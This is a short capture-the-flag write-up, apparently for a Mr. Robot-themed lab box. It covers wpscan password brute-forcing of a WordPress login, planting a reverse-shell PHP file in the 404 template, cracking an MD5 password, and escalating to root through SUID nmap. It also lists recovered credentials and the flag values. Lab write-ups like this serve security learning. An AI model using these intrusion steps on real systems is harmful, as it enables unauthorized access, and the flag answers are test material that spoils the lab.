Key 1
plaintext
- http://10.10.144.188/robots.txt
- http://10.10.144.188/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9Key 2
plaintext
- http://10.10.144.188/fsocity.dic > uniq.txt
- https://10.10.143.235/wp-login <- brute force with 'elliot' and uniq.txt
- wpscan --url http://10.10.143.235/wp-login -U elliot -P uniq.txt
elliot:ER28-0652
- edit the 404 page with the rev_shell.php (Appearance > Editor > 404.php)
- start listener on port 4444
- go to https://10.10.143.235/404
daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
robot:abcdefghijklmnopqrstuvwxyz
- su - robot <- pass: abcdefghijklmnopqrstuvwxyz
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959Key 3
plaintext
- LinPEAS -> SUID - Check easy privesc, exploits and write perms
-/usr/local/bin/nmap
- OR Find root processes:
- find / -perm +6000 2>/dev/null | grep '/bin/'
- /usr/local/bin/nmap
https://gtfobins.github.io/gtfobins/nmap/#shell
- cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4